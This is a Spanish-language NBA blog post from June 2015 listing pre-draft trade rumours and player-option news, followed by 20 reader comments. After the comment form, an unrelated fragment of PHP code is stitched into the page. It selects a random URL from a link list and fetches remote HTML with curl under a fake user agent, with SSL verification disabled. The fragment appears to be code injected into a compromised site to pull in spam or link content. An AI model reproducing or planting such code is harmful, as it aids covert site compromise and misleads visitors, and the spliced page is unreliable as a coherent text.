Rumores y noticias pre-draft

23 de June de 2015 por txusma

No podíamos hacer oidos sordos a las demandas de los cientos y cientos de lectores que nos han pedido un artículo donde comentar los rumores que más suenan en estas horas previas de draft. Hay unos cuantos y algunos muy jugosos:

25 de Junio, 11:00

Se aceleran los movimientos en las horas previas al draft con un protagonista principal, los Charlotte Hornets, muy activos desde incluso antes que acabaran las finales de la NBA. En las últimas horas han llegado a North Carolina Nico Batum y Jeremy Lamb, el primero a cambio de Noah Vonleh y Gerald Henderson y el segundo a cambio de Matt Barnes. En Portland las cosas pintan a la salida de Lamarcus Aldridge y a reconstrucción. En cambio los Thunder se han hecho con un jugador valiosísimo cuando los partidos se ponen calientes de verdad y ahorran dinero de cara a la renovación de Enes Kanter. Por su parte, los Hornets refuerzan su juega exterior algo que hacía mucha falta tras la salida de Lance Stephenson.

Pero no han acabado ahí las noticias. También se ha confirmado que Kevin Love saldrá al mercado de agentes libres, así como su compañero JR Smith. David WestMonta Ellis y Ed Davis también han renunciado a su player option y escucharán ofertas este verano. El que sí continuarán en su equipo es Kostas Papanikolau después de que los Rockets ejercieran la Team Option.

En el apartado de rumores la estrella sigue siendo Demarcus Cousins. Los Lakers siguen siendo los mejor posicionados pero los Kings se han descolgado con una propuesta inaceptable por la franquicia angelina: Cousins a cambio de Jordan Clarkson, Julius Randle y el pick número 2, es decir, todo el futuro amarillo y púrpura.

Otros que negocian un trade de proporciones considerables son los Celtics. Han ofrecido a Marcus Smart, Kelly Olynyk y el número 16 por Nerlens Noel y el número 3. Los Sixers han necesito un milisegundo para rechazar el traspaso pero el rumor confirma el interés de los Celtics por escalar posiciones en el draft.

Y para acabar:

– Los Clippers buscan hacerse con los servicios de Paul Pierce, para ello están intentando traspasar jugadores de banquillo para conseguir así trade exceptions.

– Los Hornets buscan traspasar a Cody Zeller a cambio de otro jugador exterior. Esto refuerza la teoría de que la franquicia de Michael Jordan se plantea draftear un jugador interior en lugar de algún exterior como Devin Booker.

Danilo Gallinari es otro que está en el mercado, como todos los Nuggets, de hecho. 

23 de Junio, 16:00

– A pesar de que la directiva de los Sacramento Kings se esfuerce en negarlo ya es un secreto a voces que George Karl quiere traspasar a Demarcus Cousins, uno de los 3 mejores pívots de la liga. El mismo Cousins ha dejado muy clara su opinión al respecto en twitter:


Así que ya podemos empezar a elucubrar sobre dónde acabará el jugador de los Kings la noche del draft. De momento, lo que más suena es un traspaso a los Lakers con los Magic como tercer equipo implicado. Como ya comentaba Triceratops en otro post, Cousins iría a los Lakers, Nikola Vucevic a los Kings y Julius Randle y el jugador que escojan los Lakers con la 2ª elección a los Magic.

Relacionado también con los Kings que no os extrañen que bajen posiciones en el draft y que acaben haciéndose con Rajon Rondo, sobre el que han mostrado interés. Traspasan a Cousins por problemas extradeportivos (se supone) y se interesan en Rondo. Bien, Kings, bien…

– Otro de los nombres que más suenan estos días es el de Dwyane Wade, que todavía no ha ejercido su Player Option para la siguiente temporada. Si el jugador acaba saliendo al mercado recibirá ofertas por doquier, por ejemplo de los Lakers (que serán relacionado con todos y cada uno de los agentes libres de la liga, ya veréis). El que ya ha anunciado que sale al mercado es Goran Dragic al que los Heat le pueden llegar a ofrecer 80 millones por 5 años de contrato. Otro nombre que se relaciona con el de la franquicia de Florida es el de Carlos Boozer.

– Los Pistons ya han fichado a Ersan Ilyasova y ahora parecen interesados en Tim Hardaway Jr. Con Reggie Jackson en el equipo (aunque aún tienen que renovarlo) podrían enviar a Brandon Jennings a la gran manzana.

– 23’8 millones por 4 años de contrato. Eso es lo que los Houston Rockets habrían ofrecido al madridista Sergi Llull para que hiciera las maletas rumbo a Texas.

– Los Warriors andan como locos por traspasar a David Lee y es que han de preparar un buen saco de dinero si quieren renovar a Draymond Green.

Arron Afflalo ha renunciado a su player option de 7’75 millones que tenía con los Blazers. Sale a mercado y no parece nada interesado en renovar con la franquicia de Oregon.

– Y repasamos la lista de jugadores que sí han ejercido ya sus player options: Jeff Green, Eric Gordon, Al Jefferson, Gerald Henderson, Chase Budinger, Cartier Martin y Garrett Temple.

Comenta

20 comentarios a esta entrada

  1. Triceratops dice:
    #1

    Soltar a una estrella como Vucevic que en cuanto juegue en un equipo con balance positivo será All-Star, por 2 rookies uno de ellos con una grave lesión ya a su espalda, me parecería otra cagada infame. Orlando necesita resultados ya, no ponerse a recoleccionar cachorros y esperar 3-4 años a que den frutos justo cuando sean agentes libres y se piren.

    Espero que este rumor sea una falacia porque acabaría decepcionado una vez más.

      Citar

  2. Viva_Dirk dice:
    #2

    Yo como aficionado Laker no quiero ese traspaso. Lakers debe mantener a los jóvenes e intentar fichar FAs con el hueco libre y con la promesa de ser la estrella de la franquicia más glamour osa del planeta.

    Sin embargo si fuese de los Magic como tu estaría deseando el trade, a un equipo con Payton-Oladipo-Winslow-Randle-Okafor-Gordon solo hay que darle un par de años para que pelee por todo, y sus resultados inmediatos no serían peores que con Vucevic. Y además tendrían un dineral para ofrecer.

      Citar

  3. Jose Luis dice:
    #3

    Estoy con Viva_Dirk

      Citar

  4. Vader dice:
    #4

    Pues yo creo que no podéis estar más equivocados XD… Por Cousins doy lo que me pidan, Randle, el pick 2, etc…

    Pero no os caerá esa breva, no creo que Kings lo traspasen a un rival directo de división. Se pondrían toda la afición en contra. Si finalmente se hiciera algún traspaso de Cousins lo veo más en Boston, que tienen muchos recursos en forma de picks, o en Denver a cambio de jugadores que pueden aportar desde ya.

    También he leído que lo de Bledsoe + pick 13 por el pick 4 de Knicks es humo, lo que yo me pensaba… Demasiado bonito XD.

    Saludos

      Citar

  5. Ruxixón dice:
    #5

    Estoy con Vader,pero sólo para no perder la costumbre de no coincidir con Jose Luis jajaj.Na,a mí me parecería un fichajazo para Lakers,que les daría más garantías de en 2016 de ir a por peces gordos.Cousins es mayor reclamo que Randle y Okafor.Juntar ese factor y el rendimiento que puede dar Cousins en la cancha.De todas formas dudo que Sacramento haga ese movimiento.Casi estoy por pensar que van a mover el pick y obtener a Lawson en retorno.

      Citar

  6. Triceratops dice:
    #6

    Monta Ellis se declara agente libre. Me gustaría que fichase por un equipo del Este y el nivel de esta conferencia subiese un poco.

      Citar

  7. Triceratops dice:
    #7

    Y los Magic traspasan a Ridnour a cambio de los derechos de un tal Janis Timma que jamas pisará una cancha NBA. Buen trade para ambos, los Magic liberan salarios y los Grizzlies añaden un veterano a su banquillo que cuando le toque jugar lo hará lo mejor que pueda, y si no juega, no se quejará.

      Citar

  8. Triceratops dice:
    #8

    Rumor…Boston ofrece a Marcus Smart, Kelly Olynik y su pick 16 por Nerlens Noel y el pick 3 de los 76ers.
    Me parece una tomadura de pelo ofrecerle eso a Philly, la verdad.

      Citar

  9. Ruxixón dice:
    #9

    Triceratops:
    Y los Magic traspasan a Ridnour a cambio de los derechos de un tal Janis Timma que jamas pisará una cancha NBA. Buen trade para ambos, los Magic liberan salarios y los Grizzlies añaden un veterano a su banquillo que cuando le toque jugar lo hará lo mejor que pueda, y si no juega, no se quejará.

    Hay quien ve ese traspaso como un guiño claro a la elección de Porzingis en el draft.Ambos son letones.Igual invitan al primero para la SL para hacerle las cosas más fáciles a Porzingis de primeras,no sé.La verdad es que está bien tirado el motivo.

      Citar

  10. Triceratops dice:
    #10

    Ruxixón: Hay quien ve ese traspaso como un guiño claro a la elección de Porzingis en el draft.Ambos son letones.Igual invitan al primero para la SL para hacerle las cosas más fáciles a Porzingis de primeras,no sé.La verdad es que está bien tirado el motivo.

    hahaha yo creo que no, simplemente los Magic quieren quitarse salario de encima y traspasan a un jugador que no les es util por los derechos de uno que no creo que juegue nunca allí.
    Si los Magic eligen a Porzingis, que sea para traspasarlo por favor, El hype de ese jugador es enorme y es una mezcla mala de Bargnani mas Biedrins.

      Citar

  11. Jose Luis dice:
    #11

    Batum a Hornets por Vonleh y Henderson

      Citar

  12. Ruxixón dice:
    #12

    Jose Luis:
    Batum a Hornets por Vonleh y Henderson

    Pues así de primeras movimiento curioso el de Charlotte.Que yo recuerde Batum siempre jugó de SF pero igual se plantean darle minutos de 2 con Kidd-Gilchrist de 3.El francés viene de su peor año así que por el bien de los abejorros más le vale recuperar tono.Por contra se cargan a Vonleh,apuesta fallida de la franquicia,aunque no sé si el término apuesta es algo que deba ir al lado del nombre de Vonleh porque no le han dado bola.A día de hoy me gusta bastante más el movimiento por parte de los de Oregon.

    En clave draft,tenía mis temores a que Charlotte la liara en el draft después del traspaso de Stephenson y juntar en el equipo a tanto interior,en el sentido de que elegirían a otro interior -apostaba por Caunley Stein- y este movimiento y los rumores en torno a Cody Zeller,parece que van a inclinarse por esa vía,aunque se dice que para elegir a Kaminsky.La tendencia en los mocks era Devin Booker con su pick 9 pero de nuevo otro rumor coloca a Barnes en Oklahoma -y posteriormente cortado para hacer hueco salarial para renovar a Kanter- a cambio de Jeremy Lamb,así que juntando todos los rumores,muy probable que Charlotte vaya a por un hombre alto.

      Citar

  13. Triceratops dice:
    #13

    Si, Barnes a OKC y Lamb a Charlotte.
    Para mi ganan los Hornets claramente. Los Blazers creo que salen muy mal parados a la espera de que haya suerte y el melón de Vonleh salga bueno y dulce.
    Y los OKC consiguen a un gran jugador de equipo como Barnes experto en todo tipo de batallas. Buen movimiento.

      Citar

  14. Ruxixón dice:
    #14

    Al parecer en Miami quieren disponer de todo el dinero posible para la FA y andan pensando en deshacerse de su ronda de draft…soy yo Hinkie e intentaría hacerme con ella si Winslow o Stanley Johnson (me gusta más el primero) está disponible a esas alturas.Eso contando con que Russell llegue en el 3 -si no,76ers tiene que escoger si o si al mejor que quede de los 3 bichos-.De un plumazo te ventilas dos posiciones del backcourt con buenos jugadores.

    En fin…yo me iré a echar la siesta a eso de las 7 porque esta noche promete cosa bárbara.Luego igual hay gatillazo porque están poniendo las expectativas muy altas.Qué elegirá NYK,quién se hará con Porzingis o Hezonja,habrá sorpresones en forma de subidas y bajadas,habrá traspasos sonados…

      Citar

  15. Vader dice:
    #15

    Ruxixón:
    Al parecer en Miami quieren disponer de todo el dinero posible para la FA y andan pensando en deshacerse de su ronda de draft…soy yo Hinkie e intentaría hacerme con ella si Winslow o Stanley Johnson (me gusta más el primero) está disponible a esas alturas.Eso contando con que Russell llegue en el 3 -si no,76ers tiene que escoger si o si al mejor que quede de los 3 bichos-.De un plumazo te ventilas dos posiciones del backcourt con buenos jugadores.

    En fin…yo me iré a echar la siesta a eso de las 7 porque esta noche promete cosa bárbara.Luego igual hay gatillazo porque están poniendo las expectativas muy altas.Qué elegirá NYK,quién se hará con Porzingis o Hezonja,habrá sorpresones en forma de subidas y bajadas,habrá traspasos sonados…

    Yo acabo de despertarme de la siesta XD, hay que estar preparado… Y sí, yo no quiero tener muchas expectativas porque luego no hay tantas sorpresas como uno pueda pensar y te quedas decepcionado.

    Pero vamos, que cositas pasaran seguro, ya tengo ganas de que empiece.

    Saludos

      Citar

  16. Triceratops dice:
    #16

    Vader, guapetón, esta noche , vemos y comentamos el Draft no? ¿Alguien mas se apunta y hacemos un menage-a-trois? xD

      Citar

  17. Jose Luis dice:
    #17

    Matt Barnes a los Grizzlies por Ridnour… ¿?

      Citar

  18. Vader dice:
    #18

    Triceratops:
    Vader, guapetón, esta noche , vemos y comentamosel Draft no? ¿Alguien mas se apunta y hacemos un menage-a-trois? xD

    Allí estaré, tablet en mano. Eso si, no esperéis grandes parrafadas porque odio los teclados digitales. Iremos comentando los picks que salgan primeros y los traspasos importantes (si los hubiera).

      Citar

  19. Jose Luis dice:
    #19

    Bueno, y Ridnour a Oklahoma a cambio de Jeremy Lamb

    Hornets in: Hawes, Batum, Jeremy Lamb
    Hornets out: Henderson, Vonleh, Stephenson

    Barnes fue adquirido y traspasado, al igual que Ridnour

      Citar

  20. Txusma dice:
    #20

    Yo tb estaré viendo el draft, al menos los puestos de lotería y alguno más.
    Ahora monto un sala de chat para comentarlo todo más cómodamente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>